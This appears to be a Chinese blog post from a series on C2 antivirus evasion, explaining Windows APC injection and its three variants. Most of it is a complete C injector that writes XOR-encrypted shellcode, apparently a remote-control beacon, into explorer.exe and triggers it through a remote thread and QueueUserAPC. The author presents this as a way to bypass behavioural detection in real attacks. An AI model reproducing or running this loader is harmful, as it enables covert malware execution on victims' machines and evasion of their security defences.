【免殺】C2免殺技術（八）APC注入

本文主要寫點自己的理解，如有問題，請諸位指出！

概念和流程

“APC注入”（APC Injection）是免殺與惡意代碼注入技術中的一種典型方法，主要用于在目標進程中遠程執行代碼，常見于后門、遠控、植入型木馬等攻擊場景。該技術的核心在于利用 Windows 的 APC（Asynchronous Procedure Call，異步過程調用）機制，將惡意代碼注入到其他線程中執行，尤其是掛起狀態或等待狀態的線程。

APC機制等基本知識，可自行了解。

Windows系統中的APC機制允許將一個函數排入線程的APC隊列中。當線程進入“警報可接收狀態（Alertable State）”時，例如調用 SleepEx、WaitForSingleObjectEx 等帶 Ex 后綴的函數時，APC隊列中的函數就會被執行。這本質上是系統提供的一種線程內異步執行函數的機制。

我的理解：在C2免殺領域，APC注入就是“植入惡意回調隊列”。我把它分為三種形式：

1、采用自身線程：將惡意代碼函數排入APC隊列→觸發Alertable狀態

2、自建遠程線程：打開目標進程、自建線程、將惡意代碼的函數插入APC、構造Alertable環境

3、采用目標線程：目標進程寫入惡意代碼→獲取目標線程→將惡意代碼的函數插入APC→等待或觸發Alertable狀態→APC自動執行

步驟	自身線程	自建遠程線程	目標線程（合法線程）
1. 找目標	無（當前進程）	查找目標進程	查找目標進程與線程
2. 分配內存	VirtualAlloc	VirtualAllocEx	VirtualAllocEx
3. 寫入Shellcode	直接寫入	WriteProcessMemory	WriteProcessMemory
4. APC排隊	QueueUserAPC	QueueUserAPC	QueueUserAPC
5. 觸發執行	SleepEx 等待APC	自建遠程線程中 SleepEx	強制目標線程 Alertable 狀態

免殺效果演示

這里采用第二種形式做演示：自建遠程線程！

因為我要用DF查殺的那個xor加載器做對比演示，本身APC結合xor就不是明智之舉，因此第一種“自身線程”的形式，單純結合xor等于沒加密，靜態掃描一查一個殺！第三種“目標線程”的形式倒是做出來對比效果了，但是穩定性極差，少數情況下實戰可能能用到，但是不適合做演示，說服力不足！

改造好的代碼

該注入器通過遠程分配內存與APC機制，把加密的shellcode寫入目標進程，再用自建“永遠Alertable”的線程自動觸發APC，達到繞過部分行為檢測的內存執行效果。

#include <Windows.h>
#include <TlHelp32.h>
#include <stdio.h>
#include <Psapi.h>
#pragma comment(lib, "Psapi.lib")unsigned char enc_shellcode[] = "\x97\x3d\xed\x8f\x85\x86\xa3\x75\x6e\x6b\x34\x3f\x2a\x25\x3c\x3a\x23\x26\x5a\xa7\x0b\x23\xfe\x3c\x0b\x3d\xe5\x39\x6d\x26\xe0\x27\x4e\x23\xfe\x1c\x3b\x3d\x61\xdc\x3f\x24\x26\x44\xa7\x23\x44\xae\xc7\x49\x0f\x17\x77\x42\x4b\x34\xaf\xa2\x78\x2f\x6a\xb4\x8c\x86\x27\x2f\x3a\x3d\xe5\x39\x55\xe5\x29\x49\x26\x6a\xa5\x08\xea\x0d\x76\x60\x77\x1b\x19\xfe\xee\xe3\x75\x6e\x6b\x3d\xeb\xab\x01\x09\x23\x74\xbe\x3b\xfe\x26\x73\x31\xe5\x2b\x55\x27\x6a\xa5\x8d\x3d\x3d\x91\xa2\x34\xe5\x5f\xfd\x26\x6a\xa3\x23\x5a\xbc\x26\x5a\xb5\xc2\x2a\xb4\xa7\x66\x34\x6f\xaa\x4d\x8e\x1e\x84\x22\x68\x39\x4a\x63\x30\x57\xba\x00\xb6\x33\x31\xe5\x2b\x51\x27\x6a\xa5\x08\x2a\xfe\x62\x23\x31\xe5\x2b\x69\x27\x6a\xa5\x2f\xe0\x71\xe6\x23\x74\xbe\x2a\x2d\x2f\x33\x2b\x37\x31\x34\x36\x2a\x2c\x2f\x31\x3d\xed\x87\x55\x2f\x39\x8a\x8e\x33\x34\x37\x31\x3d\xe5\x79\x9c\x21\x94\x8a\x91\x36\x1f\x6e\x22\xcb\x19\x02\x1b\x07\x05\x10\x1a\x6b\x34\x38\x22\xfc\x88\x27\xfc\x9f\x2a\xcf\x22\x1c\x53\x69\x94\xa0\x26\x5a\xbc\x26\x5a\xa7\x23\x5a\xb5\x23\x5a\xbc\x2f\x3b\x34\x3e\x2a\xcf\x54\x3d\x0c\xc9\x94\xa0\x85\x18\x2f\x26\xe2\xb4\x2f\xd3\x28\x7f\x6b\x75\x23\x5a\xbc\x2f\x3a\x34\x3f\x01\x76\x2f\x3a\x34\xd4\x3c\xfc\xf1\xad\x8a\xbb\x80\x2c\x35\x23\xfc\xaf\x23\x44\xbc\x22\xfc\xb6\x26\x44\xa7\x39\x1d\x6e\x69\x35\xea\x39\x27\x2f\xd1\x9e\x3b\x45\x4e\x91\xbe\x3d\xe7\xad\x3d\xed\xa8\x25\x04\x61\x2a\x26\xe2\x84\x26\xe2\xaf\x27\xac\xb5\x91\x94\x8a\x91\x26\x44\xa7\x39\x27\x2f\xd1\x58\x68\x73\x0e\x91\xbe\xf0\xae\x64\xf0\xf3\x6a\x75\x6e\x23\x8a\xa1\x64\xf1\xe2\x6a\x75\x6e\x80\xa6\x87\x8f\x74\x6e\x6b\x9d\xcc\x94\x8a\x91\x44\x11\x5d\x0f\x17\x6e\x9e\xe1\x94\xb9\x9b\x78\x83\xcc\x97\xe4\x7a\xf1\xa8\x9c\x2f\x5e\x92\x2e\xa9\x05\xac\x3b\x1a\x80\xad\x7f\x9b\xdc\x1a\x02\xe9\xa4\x43\x22\x61\x1c\xd2\xfe\x99\xcc\xb0\x2d\x7c\x58\xf8\x57\xe2\x0f\x1c\x40\xba\xc6\x72\xaf\x70\xdb\x00\x10\x71\xe1\x7d\x09\x2b\x1e\x34\xc1\x39\x43\xe5\x5b\x11\x81\x79\x75\x3b\x18\x10\x1c\x46\x34\x09\x0e\x1b\x1a\x51\x55\x23\x04\x0f\x07\x07\x19\x0f\x44\x40\x40\x5b\x55\x46\x08\x1a\x03\x1b\x14\x1a\x02\x17\x02\x0e\x4e\x4e\x26\x26\x27\x2e\x55\x57\x45\x45\x55\x4b\x22\x07\x05\x11\x01\x1c\x06\x4e\x25\x21\x4e\x5d\x5b\x5f\x50\x55\x3a\x19\x1c\x0a\x0e\x1b\x1a\x44\x40\x40\x5b\x5c\x4e\x27\x37\x2c\x39\x3a\x39\x38\x30\x3c\x66\x7f\x6e\xb3\x68\x27\xa6\x09\x09\xbf\x40\x64\xa6\x7e\x01\x28\xcd\x43\x33\x14\xb8\x22\xe3\x86\xe1\xbc\x6e\xbd\x0d\xd3\xa5\x0b\x86\x8d\xa6\x62\x24\x96\xe4\xa7\x64\x15\x25\x41\x93\xe6\xd1\x9e\xb5\xf5\x4e\x21\xed\x79\x51\xa7\xca\xe1\x1d\xa0\x13\xd2\xd8\xbc\x33\x3c\x1b\xeb\x04\x92\xbe\x0c\xd2\xd2\x84\xc4\xa4\x94\x67\xc0\xe7\xf3\x48\x36\x8f\x79\x11\xcb\x7b\xd7\x3d\x37\x32\xe9\xfc\xb7\x6a\xe1\xac\x27\xac\xe5\x30\x26\xf0\x58\x37\x41\x25\x54\xa0\xdf\xdd\x65\x7f\xe4\xfb\x0e\xff\x25\x03\x9b\x8e\xfb\x98\xab\xca\xf0\x6a\xe2\x5b\xae\xcb\x61\xfa\xaa\x15\xdc\x51\xd6\x58\x7c\x1b\x64\x83\xd0\xa6\x89\xe9\x2c\xa6\xff\x40\x9e\x83\xd5\x03\x41\x1d\x9c\xee\x07\x67\x80\xf9\xa3\x3f\x24\x32\x31\x0d\x28\x5e\xff\xa2\xd5\x4b\x2a\xd7\xb1\x4d\xed\x97\x38\xcb\x72\xa3\x18\x86\x4f\x41\xb6\xf1\x07\x4f\x9a\x22\x8c\xea\xe8\x5b\x09\x7e\xff\x54\x48\xcb\x55\xf6\xd9\x0b\xef\x4e\xb2\xc2\xca\x02\xe3\x6e\x2a\xcb\x9e\xde\xd7\x38\x94\xa0\x26\x5a\xbc\xd4\x6b\x75\x2e\x6b\x34\xd6\x6b\x65\x6e\x6b\x34\xd7\x2b\x75\x6e\x6b\x34\xd4\x33\xd1\x3d\x8e\x8a\xbb\x23\xe6\x3d\x38\x3d\xe7\x8c\x3d\xe7\x9a\x3d\xe7\xb1\x34\xd6\x6b\x55\x6e\x6b\x3c\xe7\x92\x34\xd4\x79\xe3\xe7\x89\x8a\xbb\x23\xf6\xaa\x4b\xf0\xae\x1f\xc3\x08\xe0\x72\x26\x6a\xb6\xeb\xab\x00\xb9\x33\x2d\x36\x23\x70\x6e\x6b\x75\x6e\x3b\xb6\x86\xf4\x88\x91\x94\x44\x57\x59\x5b\x5f\x5d\x4d\x40\x5f\x4d\x40\x5a\x75\x6e\x61\x59\x44";
size_t shellcode_len = sizeof(enc_shellcode);const char xor_key[] = "kun";
size_t xor_key_len = sizeof(xor_key) - 1;// x64 SleepEx(INFINITE, TRUE) stub (占用18字節)
unsigned char sleepStub[] = {// mov ecx, 0xFFFFFFFF0xB9, 0xFF, 0xFF, 0xFF, 0xFF,// mov edx, 0x010xBA, 0x01, 0x00, 0x00, 0x00,// mov rax, SleepEx地址(后面動態填充)0x48, 0xB8, 0,0,0,0, 0,0,0,0,// call rax0xFF, 0xD0,// ret0xC3
};
size_t stub_len = sizeof(sleepStub);DWORD64 GetRemoteProcAddress(HANDLE hProcess, const wchar_t* dllName, const char* funcName) {HMODULE hMods[1024];DWORD cbNeeded;if (EnumProcessModules(hProcess, hMods, sizeof(hMods), &cbNeeded)) {for (unsigned int i = 0; i < (cbNeeded / sizeof(HMODULE)); i++) {wchar_t szModName[MAX_PATH];if (GetModuleBaseNameW(hProcess, hMods[i], szModName, sizeof(szModName) / sizeof(wchar_t))) {if (_wcsicmp(szModName, dllName) == 0) {HMODULE hLocal = GetModuleHandleW(dllName);FARPROC fLocal = GetProcAddress(hLocal, funcName);DWORD64 offset = (DWORD64)fLocal - (DWORD64)hLocal;return (DWORD64)hMods[i] + offset;}}}}return 0;
}// 自動查找 explorer.exe（或你指定的進程）
DWORD FindTargetProcess(LPCWSTR processName) {PROCESSENTRY32 pe = { 0 };pe.dwSize = sizeof(pe);HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);if (hSnapshot == INVALID_HANDLE_VALUE) return 0;DWORD pid = 0;if (Process32First(hSnapshot, &pe)) {do {if (_wcsicmp(pe.szExeFile, processName) == 0) {pid = pe.th32ProcessID;break;}} while (Process32Next(hSnapshot, &pe));}CloseHandle(hSnapshot);return pid;
}int InjectAPCWithStub(DWORD pid) {HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);if (!hProcess) {printf("[-] OpenProcess failed\n");return -1;}// 查找遠程進程 kernel32!SleepEx 的地址DWORD64 sleepex_addr = GetRemoteProcAddress(hProcess, L"kernel32.dll", "SleepEx");if (!sleepex_addr) {printf("[-] 找不到遠程 SleepEx 地址\n");CloseHandle(hProcess);return -10;}// 填充 stub 里的 SleepEx 地址memcpy(sleepStub + 10, &sleepex_addr, sizeof(DWORD64));// 分配并寫入sleepStubLPVOID remoteStub = VirtualAllocEx(hProcess, NULL, stub_len, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);if (!remoteStub) {printf("[-] 分配線程stub失敗\n");CloseHandle(hProcess);return -2;}if (!WriteProcessMemory(hProcess, remoteStub, sleepStub, stub_len, NULL)) {printf("[-] 寫入線程stub失敗\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);CloseHandle(hProcess);return -3;}// 分配ShellcodeLPVOID remoteShell = VirtualAllocEx(hProcess, NULL, shellcode_len, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);if (!remoteShell) {printf("[-] 分配shellcode失敗\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);CloseHandle(hProcess);return -4;}// 寫入加密shellcodeif (!WriteProcessMemory(hProcess, remoteShell, enc_shellcode, shellcode_len, NULL)) {printf("[-] 寫入shellcode失敗\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -5;}// 解密for (size_t i = 0; i < shellcode_len; ++i) {unsigned char dec = enc_shellcode[i] ^ xor_key[i % xor_key_len];if (!WriteProcessMemory(hProcess, (LPVOID)((BYTE*)remoteShell + i), &dec, 1, NULL)) {printf("[-] 解密寫入失敗@%zu\n", i);VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -6;}}// 改為可執行DWORD oldProtect;VirtualProtectEx(hProcess, remoteShell, shellcode_len, PAGE_EXECUTE_READ, &oldProtect);// 新建線程，入口為我們的stubHANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteStub, NULL, CREATE_SUSPENDED, NULL);if (!hThread) {printf("[-] 新建遠程線程失敗\n");VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hProcess);return -7;}// 投遞APCif (!QueueUserAPC((PAPCFUNC)remoteShell, hThread, NULL)) {printf("[-] APC掛載失敗\n");TerminateThread(hThread, 0);VirtualFreeEx(hProcess, remoteStub, 0, MEM_RELEASE);VirtualFreeEx(hProcess, remoteShell, 0, MEM_RELEASE);CloseHandle(hThread);CloseHandle(hProcess);return -8;}// 喚醒線程，進入alertable，APC立即執行ResumeThread(hThread);printf("[+] APC注入并觸發完成，目標PID: %u\n", pid);// 收尾CloseHandle(hThread);CloseHandle(hProcess);return 0;
}int wmain() {LPCWSTR target = L"explorer.exe";DWORD pid = FindTargetProcess(target);if (!pid) {wprintf(L"[-] 未找到目標進程: %ls\n", target);return -1;}wprintf(L"[+] 目標進程: %ls (PID: %u)\n", target, pid);return InjectAPCWithStub(pid);
}